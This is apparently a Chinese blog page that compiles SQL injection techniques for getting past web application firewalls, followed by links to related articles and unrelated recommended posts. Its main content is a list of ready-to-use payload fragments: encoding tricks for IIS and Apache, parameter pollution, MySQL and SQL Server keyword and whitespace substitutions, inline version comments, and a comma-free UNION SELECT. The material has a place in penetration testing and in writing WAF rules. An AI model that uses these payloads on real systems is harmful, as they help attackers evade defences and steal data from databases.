1、SQL注入过程中的处理#

  终端payload编码------>web服务器解码-------->CGI脚本解码------>web应用解码----->数据库解码

浏览器、代理等

  ISS/Apache/Tomcat

  php/java/asp.net

  xxx系统

  mysql/sqlserver

  硬件waf

  软件waf

2、bypass方法#

 2.1 服务器层面bypass#

  2.1.1 IIS+ASP、URL处理#

  %符号的处理:会自动去掉特殊符号%,例如输入se%lect,解析出select。

  unicode处理:%u,会自动解码,例如s%u006c%u0006ect

  2.1.2 Apache#

  有的版本允许畸形请求存在,例如GET可替换为任意word,例如"DOTA"  

  2.1.3 HPP方式#

  id=1&id=2&id=3

  Asp.net + iis:   id=1,2,3

  php + apache: id = 3

 2.2 数据库层面bypass#

  1 union select a,b from where and 1 2 3 4 5 6 7 8 9

  2.2.1 mysql数据库#

  位置1的替换

  1、(\N)   --->      id=\Nunion select

  2、浮点数直接连接 -------->       id=1.1union select

  3、(nen) n为整数   --------->     1e2union select

4、单/双引号(如需要单/双引号闭合,则无需空格)

  5、左括号: ----------> union (select xx)

  6、注释:任意/**/注释   ------------------> 1/*here*/union select xx

  7、特殊注释:其中的数字和版本有关,一般大于10000都行。 ----->  id=1/*!50000union*/select

  

  位置2的替换#

  位置3的替换#

  1、空格替换:有如下字符可替代空格

  %09, %0a, %0b, %0c, %0d, %a0

  2、注释:任意/**/注释,例如  ---->   union/*here*/select xx

  3、左括号:       ------>           1 union (select xx)

  位置4的替换#

  位置5的替换#

  1、空格替换:有如下字符可替代空格

  %09, %0a, %0b, %0c, %0d, %a0

  2、左括号: ------>   1 union select (1), xx

  3、运算符

  加减号:   1 union select+1,xx1 union select-1,xx

  ~符号:     1 union select~1, xx

  !符号:      1 union select!1,xx

  @``@^符号:(at后面是反引号): 1 union select@`1`, xx1 union select@^1, xx

  注释:任意/**/注释:  1/*here*/union select xx

  特殊注释: 1 union/*!50000select*/1, xx

  反引号:   1 union select `user`, xx

  单/双引号:  1 union select"1", xx

  {}大括号:    1 union select{x 1}, xx

  \N符号:      1 union select\N, xx

  位置6替换#(同位置5替换)

  位置7替换#(参考位置5,无算数运算符)

 其他#

  1、字符串截取函数

  Mid(version(), 1,1)

  Substr(version(),1,1)

  Substring(version(),1,1)

  Lpad(version(),1)

  Rpad(version(),1,1)

  Left(version(),1)

  reverse(right(reverse(version()),1)

  2、字符串连接函数

  concat(version(), '|', user());

  concat_ws('|',1,2,3)

  3、字符转换

  Ascii(1)

  Char(49)

  Hex('a')

  Unhex(61)

  4、/*!50000keyword*/替换

  任何关键字都可以用/*!50000keyword*/替换

sqlserver数据库

空格替换#

空格符可使用以下符号替换:

01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20
位置5/6的替换#

1、:号

1 union select:top 1 from
位置7的替换:#

1、.号

1 union select xx from.table

2、:号

1 union select xx from:table
and后的替换:#

1、:号

1 and:xx

2、%2b号

1 and%2bxx
其他#

1、字符串截取函数

Substring(@@version,1,1)Left(@@version,1)Right(@@version,1)

2、字符串转换函数

Ascii(‘a’) 这里的函数可以在括号之间添加空格的,一些waf过滤不严会导致bypassChar(‘97’)

 

当存在sql注入的情况,但是过滤了“,”,利用UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b实际上也就相当于UNION SELECT 1,2

SQL注入绕过技巧总结的更多相关文章

  1. SQL注入绕过技巧

    1.绕过空格(注释符/* */,%a0): 两个空格代替一个空格,用Tab代替空格,%a0=空格: % % %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注 ...

  2. SQL Injection绕过技巧

    0x00 sql注入的原因 sql注入的原因,表面上说是因为 拼接字符串,构成sql语句,没有使用 sql语句预编译,绑定变量. 但是更深层次的原因是,将用户输入的字符串,当成了 "sql语 ...

  3. SQL注入绕过的技巧总结

    sql注入在很早很早以前是很常见的一个漏洞.后来随着安全水平的提高,sql注入已经很少能够看到了.但是就在今天,还有很多网站带着sql注入漏洞在运行.稍微有点安全意识的朋友就应该懂得要做一下sql注入 ...

  4. 深入理解SQL注入绕过WAF和过滤机制

    知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...

  5. 深入了解SQL注入绕过waf和过滤机制

    知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 ...

  6. 深入理解SQL注入绕过WAF与过滤机制

    知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...

  7. TSRC挑战赛:WAF之SQL注入绕过挑战实录

    转自腾讯 博文作者:TSRC白帽子 发布日期:2014-09-03 阅读次数:1338 博文内容: 博文作者:lol [TSRC 白帽子] 第二作者:Conqu3r.花开若相惜 来自团队:[Pax.M ...

  8. 五十:代码审计-PHP无框架项目SQL注入挖掘技巧

    代码审计教学计划: 审计项目漏洞Demo->审计思路->完整源码框架->验证并利用漏洞 代码审计教学内容: PHP,JAVA网站应用,引入框架类开发源码,相关审计工具及插件使用 代码 ...

  9. SQL注入绕过waf的一万种姿势

      绕过waf分类: 白盒绕过: 针对代码审计,有的waf采用代码的方式,编写过滤函数,如下blacklist()函数所示: 1 ........ 2 3 $id=$_GET['id']; 4 5 $ ...

随机推荐

  1. 比较两个slice、struct或者map是否相等

    我们可以直接使用reflect.DeepEqual来比较两个slice.struct或者map是否相等 package main import ( "fmt" "refl ...

  2. 正益移动推出新产品正益工作 实现PaaS+SaaS新组合

    近期,正益移动不仅将其AppCan 移动平台云化,还通过发布全新 SaaS 产品 -- 正益工作,这款集合了企业信息聚合.应用聚合.社交聚合为一体的企业移动综合门户,与 AppCan 平台一起实现了P ...

  3. http协议进阶(五)连接管理

    几乎所有的HTTP通信都是由TCP/IP承载的,TCP/IP是全球计算机网络设备都在使用的一种分组交换网络分层协议集. 它的特点是只要连接建立,客户端与服务器之间的报文交换就永远不会丢失.受损或失序. ...

  4. sub2ind函数

    sub2ind函数是MATLAB中对矩阵索引号检索的函数,用法如下: >> A=rand(5) A = 0.6850    0.0867    0.2290    0.1006    0. ...

  5. 使用BigQuery分析GitHub上的C#代码

    一年多以前,Google 在GitHub中提供了BigQuery用于查询的GitHub上的开源代码(open source code on GitHub available for querying) ...

  6. SkylineGlobe 7.0.1 & 7.0.2版本Web开发 如何正确使用三维地图控件和工程树控件

    Skyline TerraExplorer Pro目前正式发布的7.0.1&7.0.2版本,还只是64位的版本, 在Web开发的时候,如何在页面中正确嵌入三维地图控件,让一些小伙伴凌乱了. 下 ...

  7. .net core 的图片处理及二维码的生成及解析

    写代码这事,掐指算来已经十有余年. 从html到css到javascript到vbscript到c#,从兴趣到职业,生活总是失落与惊喜并存. 绝大部分时候,出发并不是因为知道该到哪里去,只是知道不能再 ...

  8. django 之 stark组件

    ----------------------------------------------------------------烦恼没完没了,内心动荡不安,呜呼哀哉. 一.有个特殊的需求,需要用sta ...

  9. __init__和__new__的区别

    根据官方文档:   __init__是当实例对象创建完成后被调用的,然后设置对象属性的一些初始值. __new__是在实例创建之前被调用的,因为它的任务就是创建实例然后返回该实例,是个静态方法.  也 ...

  10. 爬取页面InsecureRequestWarning: 警告解决笔记

    InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is s ...